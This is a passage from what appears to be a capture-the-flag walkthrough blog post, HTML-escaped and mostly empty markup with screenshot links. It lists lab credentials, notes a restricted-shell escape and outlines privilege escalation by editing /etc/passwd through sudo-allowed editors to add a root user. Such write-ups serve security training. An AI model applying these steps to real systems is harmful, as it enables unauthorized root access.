medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- So the new credentials are:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div&gt;intern:12345678900987654321&lt;/div&gt;&lt;div&gt;patrick:P@ssw0rd25&lt;/div&gt;&lt;div&gt;qiu:qiu&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;- After trying unsuccessfully SSH for &lt;b&gt;patrick&lt;/b&gt; and &lt;b&gt;qiu&lt;/b&gt;, the only account that works is &lt;b&gt;intern&lt;/b&gt;:&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEvQhyphenhyphenJo-O0M2vxmvNHxVxJt0C8dbO6LgVyvEa7-Xqv6iPQK7rRIhz9K9TnNRXmLOdCfrjrf24wlN2yzrjTQbhyphenhyphen11R43YToCSDGVaAHhNV9tGkrDvj6bLxpStHCRBbwG7rndB38FjHPQ3F/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;786&quot; data-original-width=&quot;814&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEvQhyphenhyphenJo-O0M2vxmvNHxVxJt0C8dbO6LgVyvEa7-Xqv6iPQK7rRIhz9K9TnNRXmLOdCfrjrf24wlN2yzrjTQbhyphenhyphen11R43YToCSDGVaAHhNV9tGkrDvj6bLxpStHCRBbwG7rndB38FjHPQ3F/s16000/screenshot.32.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- However the shell is not working fine, because just some commands are allowed:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuBqtIesWCfVds4a87BtHAgOXdxxEUx5DjSQWgQz_yqtcN-xMfAbGfBqf91cuASpulQNN_v23LTiF7YElddpvC7PUG89rpY3As-U6fCQ3nn0lFAZu04jxHyi0osN1FJKz-i1nBHTuCTIU8/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;115&quot; data-original-width=&quot;619&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuBqtIesWCfVds4a87BtHAgOXdxxEUx5DjSQWgQz_yqtcN-xMfAbGfBqf91cuASpulQNN_v23LTiF7YElddpvC7PUG89rpY3As-U6fCQ3nn0lFAZu04jxHyi0osN1FJKz-i1nBHTuCTIU8/s16000/screenshot.33.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxCUnCNToPgBZn44ssQTDRfARhUfvoRLvhVVbual64QYbA98i9S0PXsONmQthfr9E31W8WpBoo4RChXasPPDtEygDaeYVW0nWebE8D_B8KJG1y483CpLOsgfALEU6Srea1_V5gLbLOiCbo/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;47&quot; data-original-width=&quot;326&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxCUnCNToPgBZn44ssQTDRfARhUfvoRLvhVVbual64QYbA98i9S0PXsONmQthfr9E31W8WpBoo4RChXasPPDtEygDaeYVW0nWebE8D_B8KJG1y483CpLOsgfALEU6Srea1_V5gLbLOiCbo/s16000/screenshot.34.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Following this instructions we can improve the &lt;b&gt;Lshell&lt;/b&gt; and get rid of the limitations:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://www.aldeid.com/wiki/Lshell&quot;&gt;https://www.aldeid.com/wiki/Lshell&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiag3bRFI2Rl9Ja8v8J_O0mQbhEXI7jOxePgpdHNWR6O2JjL8pYJcxV67xo5F3A-vFbXsAKiTaXFj-6P-8MWRHCdwOJHTyaY2-1oWZkII4zNCTcZRHuLUurBB8g1vhdMiClDFwt1C1twifu/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;49&quot; data-original-width=&quot;437&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiag3bRFI2Rl9Ja8v8J_O0mQbhEXI7jOxePgpdHNWR6O2JjL8pYJcxV67xo5F3A-vFbXsAKiTaXFj-6P-8MWRHCdwOJHTyaY2-1oWZkII4zNCTcZRHuLUurBB8g1vhdMiClDFwt1C1twifu/s16000/screenshot.35.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;4 - CAPTURING THE 1st FLAG&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;local.txt&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6jZbw3s5NISonf8-NTz451kbCkBW24ELvbkzcSVKiIU_P9zdIiXjz5BwfES-ZPF57so238UN41-PZ613rVIpcKKUxVDRA-4LPh8wmgvMH9h_d6kynpF-HRuwNvwFzf9clf_oAwxpfSYM/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;512&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6jZbw3s5NISonf8-NTz451kbCkBW24ELvbkzcSVKiIU_P9zdIiXjz5BwfES-ZPF57so238UN41-PZ613rVIpcKKUxVDRA-4LPh8wmgvMH9h_d6kynpF-HRuwNvwFzf9clf_oAwxpfSYM/s16000/screenshot.36.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- User &lt;b&gt;intern&lt;/b&gt; has no sudoer privileges:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhghtQ7Zmv9SCqStFzXIvS8iugJgHczqTISP5FJFrwkmMzaxDVrpJWxym_MKay1vmMbN5CmVZQC8q0C3L02T63tAip7gdOYz3kuy4Y3ihfqWS4Ty1-hq_X5yMie7LQMmNRUnaWlceDJEfI6/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;69&quot; data-original-width=&quot;569&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhghtQ7Zmv9SCqStFzXIvS8iugJgHczqTISP5FJFrwkmMzaxDVrpJWxym_MKay1vmMbN5CmVZQC8q0C3L02T63tAip7gdOYz3kuy4Y3ihfqWS4Ty1-hq_X5yMie7LQMmNRUnaWlceDJEfI6/s16000/screenshot.38.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- However user&lt;b&gt; patrick&lt;/b&gt;&#39;s sudoer privileges allow him to&amp;nbsp;use editors like &lt;b&gt;vim&lt;/b&gt; and &lt;b&gt;nano&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0kmHL2F6Pp1C5W6GUMBDyilKj52v4-lEXeId5yj629PCaiMEiRmlxoR03UVZhpF2dGFPCiI-qrFWIP8pHjlwA8FthqzXH2_GNWJnDbLbOeyagFqdNz_HWMGdIw32-rT5yiVys1CeDxeOd/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;95&quot; data-original-width=&quot;730&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0kmHL2F6Pp1C5W6GUMBDyilKj52v4-lEXeId5yj629PCaiMEiRmlxoR03UVZhpF2dGFPCiI-qrFWIP8pHjlwA8FthqzXH2_GNWJnDbLbOeyagFqdNz_HWMGdIw32-rT5yiVys1CeDxeOd/s16000/screenshot.39.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEillYG-hd6PMiVuIR69UWH-DRbtL-e3-pCu-D0K8rFBFekajunxWkmi_XbT30Q040Vj9bgZaZWXFNoTTSgMWiQ45KseHnvoOhNxDqpNIXDUskigFmzu71udBCLtQN5alaPDzoEXEOvEqiw4/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;162&quot; data-original-width=&quot;703&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEillYG-hd6PMiVuIR69UWH-DRbtL-e3-pCu-D0K8rFBFekajunxWkmi_XbT30Q040Vj9bgZaZWXFNoTTSgMWiQ45KseHnvoOhNxDqpNIXDUskigFmzu71udBCLtQN5alaPDzoEXEOvEqiw4/s16000/screenshot.40.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- The strategy to achieve Privilege Escalation will be to edit &lt;b&gt;/etc/passwd &lt;/b&gt;adding a line with root credentials for a new user.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- First, let&#39;s create the hash for the new user &lt;b&gt;whitelist:qwerty&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidWrIQ6jabKodOzV0CzcQmLolKKsHEFUhKtJTS9oy6X4nEQLQ4HWQ_AA2q-G2q1DLELTJbWH6L-4CEOi49RkD0zjpiyet6oWId5OXirbsEyENN9uhYQ8HXPQSpXAlM8pdS3c_gHB5mRbjn/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;80&quot; data-original-width=&quot;527&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidWrIQ6jabKodOzV0CzcQmLolKKsHEFUhKtJTS9oy6X4nEQLQ4HWQ_AA2q-G2q1DLELTJbWH6L-4CEOi49RkD0zjpiyet6oWId5OXirbsEyENN9uhYQ8HXPQSpXAlM8pdS3c_gHB5mRbjn/s16000/screenshot.41.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br 